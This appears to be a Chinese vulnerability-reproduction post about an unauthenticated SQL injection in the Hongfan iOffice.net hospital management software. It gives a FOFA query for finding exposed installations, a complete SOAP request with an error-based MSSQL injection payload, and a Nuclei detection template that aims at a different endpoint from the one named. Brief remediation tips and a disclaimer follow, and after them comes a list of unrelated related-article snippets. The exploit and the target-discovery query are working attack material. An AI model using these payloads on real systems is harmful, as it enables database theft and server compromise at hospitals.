【漏洞复现】红帆iOffice.net wssRtSyn接口处存在SQL注入

【产品&&漏洞简述】

红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。

红帆iOffice.net wssRtSyn.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

【资产测绘Query】

 
  1. app="红帆-ioffice"

【产品界面】

【poc】

 
  1. POST /iOffice/prg/set/wss/wssRtSyn.asmx HTTP/1.1
  2. Host: your-ip
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
  4. Content-Type: text/xml
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  6. Accept-Encoding: gzip,deflate
  7. Connection: Keep-alive
  8. <?xml version="1.0"?>
  9. <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://iOffice.net/iOffice/ioRtSyn">
  10. <soap:Header />
  11. <soap:Body>
  12. <tns:SubmitLogInfo>
  13. <tns:data>qwe</tns:data>
  14. <tns:ServerHost>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tns:ServerHost>
  15. </tns:SubmitLogInfo>
  16. </soap:Body>
  17. </soap:Envelope>

【Nuclei-Poc验证】

 
  1. id: hongfan-iOffice-wssRtSyn-sqli
  2. info:
  3. name: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞
  4. author: 王阿姨介绍的
  5. severity: critical
  6. description: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
  7. reference:
  8. metadata:
  9. verified: true
  10. max-request: 1
  11. fofa-query: FOFA:app="红帆-ioffice"
  12. tags: sqli
  13. requests:
  14. - raw:
  15. - |
  16. POST /iOffice/prg/set/wss/ioDesktopData.asmx HTTP/1.1
  17. Host: {{Hostname}}
  18. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
  19. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  20. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  21. Accept-Encoding: gzip, deflate
  22. Connection: close
  23. Upgrade-Insecure-Requests: 1
  24. SOAPAction: http://tempuri.org/GetDepSchedule
  25. Content-Type: text/xml;charset=UTF-8
  26. <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
  27. <soap:Header/>
  28. <soap:Body>
  29. <tem:GetDepSchedule>
  30. <!--type: string-->
  31. <tem:EmpLoginID>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tem:EmpLoginID>
  32. </tem:GetDepSchedule>
  33. </soap:Body>
  34. </soap:Envelope>
  35. matchers-condition: and
  36. matchers:
  37. - type: word
  38. part: body
  39. words:
  40. - 'SQL Server'
  41. - 'System'
  42. condition: and
  43. - type: status
  44. status:
  45. - 500

【修复建议】

1、请联系厂商进行修复。
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/856712.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python网络安全项目开发实战,如何防命令注入

注意:本文的下载教程,与以下文章的思路有相同点,也有不同点,最终目标只是让读者从多维度去熟练掌握本知识点。 下载教程: Python网络安全项目开发实战_防命令注入_编程案例解析实例详解课程教程.pdf 在Python网络安全项目开发中,防止命令注入(Command Injection)是一项…

MyBatis 动态 SQL怎么使用?

引言&#xff1a;在现代的软件开发中&#xff0c;数据库操作是任何应用程序的核心部分之一。而在 Java 开发领域&#xff0c;MyBatis 作为一款优秀的持久层框架&#xff0c;以其简洁的配置和强大的灵活性被广泛应用。动态 SQL 允许开发人员根据不同的条件和场景动态地生成和执行…

ChatGPT 提问攻略:从基础到精通,掌握AI对话的艺术

提示工程&#xff08;Prompt Engineering&#xff09;的核心目标是提高 AI 输出的质量和准确性&#xff0c;让 AI 的输出结果可控&#xff0c;而不是随机的。 成功使用 ChatGPT 的关键在于提示语的质量&#xff1a;清晰、简洁的提示语有助于保持对话的连贯性&#xff0c;而模糊…

【机器学习300问】127、怎么使用词嵌入?

在探讨如何使用词嵌入之前&#xff0c;我们首先需要理解词嵌入模型的基础。之前的文章已提及&#xff0c;词嵌入技术旨在将文本转换为固定长度的向量&#xff0c;从而使计算机能够解析和理解文本内容。可以跳转下面链接去补充阅读哦&#xff01; 【机器学习300问】126、词嵌入…

会声会影2024旗舰版汉化最新安装包下载方法步骤

嗨&#xff0c;亲爱的CSDN的朋友们&#xff01;&#x1f389;今天&#xff0c;我要跟大家分享一款让你的视频编辑体验升级的神器——会声会影2024最新版本&#xff01;✨如果你是一个热衷于创作视频内容的创作者&#xff0c;那么你一定不能错过这个软件。它不仅功能强大&#x…

tqdm软件包讲解

tqdm软件包 tqdm是一个用于在Python中显示进度条的模块&#xff0c;非常适合用于长时间运行的循环和任务&#xff0c;使得用户可以直观地看到任务的进度。以下是对 tqdm 软件包的详细讲解&#xff0c;包括安装、基本使用、进阶用法和常见应用场景。 安装tqdm 安装tqdm可以使…

maven dependencyManagement作用

Maven 的 dependencyManagement 元素是一个非常强大的功能&#xff0c;它允许在一个父 POM&#xff08;Project Object Model&#xff09;文件中统一管理项目中所有子模块依赖的版本和范围。使用 dependencyManagement 可以确保项目中的所有模块使用一致的依赖版本&#xff0c;…

Windows桌面运维----第五天

1、华为路由怎们配置IP、划分vlan、互通&#xff1a; 1、用户模式→系统模式&#xff1b; 2、进入相关端口&#xff0c;配置IP地址&#xff1b; 3、开通相应vlan,设置vlanX、IP地址&#xff1b; 4、绑定相关端口&#xff0c;设置端口类型&#xff1b; 5、电脑设置IP&#…

一款Wordpress网站导航主题,带昼夜切换功能

Wordpress网站导航主题&#xff0c;带昼夜切换功能。 基于wordpress&#xff0c;部署和使用都比较方便。 界面比较简洁大方。后台管理功能也比较全面&#xff0c;值得一试。 这款主题界面、功能都非常简洁。 作者把这款定位为简约导航主题&#xff0c;所以这款wordpress导航…

ubuntu 22.04安装mongodb7

1、环境更新 sudo apt update sudo apt upgrade 要执行curl命令&#xff0c;需先安装此包 sudo apt-get install curl2、生成MongoDB的gpg秘钥和向APT导入MongoDB7.0版软件包的资源链接 curl -fsSL https://pgp.mongodb.com/server-7.0.asc | sudo gpg -o /usr/share/keyri…

uniapp小程序获取右上角胶囊位置信息

文章目录 导文使用uni.getMenuButtonBoundingClientRect();方法实现完整案例 隐藏默认导航栏&#xff1a;全局隐藏当前页面隐藏 导文 uniapp小程序获取右上角胶囊位置信息 使用uni.getMenuButtonBoundingClientRect();方法实现 <script>const menuButtonInfo uni.getMe…

被神化了的AI

多模态的大模型&#xff0c;已经在图片、文本、音频、视频领域多点开花&#xff0c;“AI取代人类”的声音不绝与耳&#xff0c;似乎AI是万能药&#xff0c;包治百病。所有互联网时代的应用&#xff0c;都可以用AI重做一遍&#xff0c;所有你能用到的难题&#xff0c;你都会想&a…

【python】flask中如何向https服务器传输信息

【背景】 用flask做一个支持流媒体传输的网页,如何将信息post给流媒体服务器呢? 【方法】 简单例子,视图函数这么写: url = "https://yourip/mytext" headers = {Content-Type:application/octet-stream} @app.route(/,methods=["POST"

zdppy_amauth如何测试批量获取用户绑定的所有权限:思路

简单的思路 1、添加用户 2、添加角色 3、绑定用户和角色的关系 4、添加3个权限 5、绑定角色和权限关系&#xff0c;给角色绑定2个权限 6、查询用户绑定的所有权限 7、删除用户 8、删除角色 9、删除权限 10、解绑用户的所有角色 11、解绑角色的所有权限

ffmpeg音视频开发从入门到精通——ffmpeg下载编译与安装

音视频领域学习ffmpeg的重要性 音视频领域中ffmpeg的广泛应用&#xff0c;包括直播、短视频、网络视频、实时互动和视频监控等领域。掌握FM和音视频技术可以获得更好的薪酬。 学习建议音视频学习建议与实战应用 音视频处理机制的学习&#xff0c;需要勤加练习&#xff0c;带…

第6章 工程项目融资 作业

第6章 工程项目融资 作业 一单选题&#xff08;共2题&#xff0c;40分&#xff09; (单选题) 项目资金结构不包括&#xff08; &#xff09;。 A.项目债务资金结构比例 B. 项目建设投资与工程项目总成本费用的比例 C. 项目资本金内部结构比例 D. 项目资本金与债务资金的比例 正…

【C++题解】1741 - 求出1~n中满足条件的数的个数和总和?

问题&#xff1a;1741 - 求出1~n中满足条件的数的个数和总和&#xff1f; 类型&#xff1a;简单循环 题目描述&#xff1a; 请求出 1∼n 之间所有满足 2 的倍数但不是 3 的倍数的数&#xff0c;有多少个&#xff0c;总和是多少&#xff1f; 输入&#xff1a; 读入一个整数 …

构建智慧高速公路:软件管理平台业务架构解析

随着交通网络的不断完善和技术的快速发展&#xff0c;智慧高速公路正成为交通领域的重要发展方向。在智慧高速公路系统中&#xff0c;软件管理平台扮演着关键的角色&#xff0c;它不仅是管理各种设备和系统的核心&#xff0c;还承担着数据监控、故障诊断、维护管理等重要任务。…

任务调度框架革新:TASKCTL在Docker环境中的高级应用

Docker&#xff1a;轻量级容器化技术的魅力 Docker 作为一款开源的轻量级容器化技术&#xff0c;近年来在 IT 界掀起了一股热潮。它通过封装应用及其运行环境&#xff0c;使得开发者可以快速构建、部署和运行应用。Docker 的优势在于其轻量级、可移植性和可扩展性&#xff0c;它…

【Python】Flask中如何定位静态文件资源

【背景】 习惯了Flask配合tornado做SAAS服务,所以有些开源的项目也希望吸纳到这个体系。这种情况下index主页需要放到templates文件夹下,静态资源需要放到static文件夹下,html内部调用资源的路径也需要改变。 【调用方法】 推荐: 把所有JS,CSS等资源放到static文件夹下…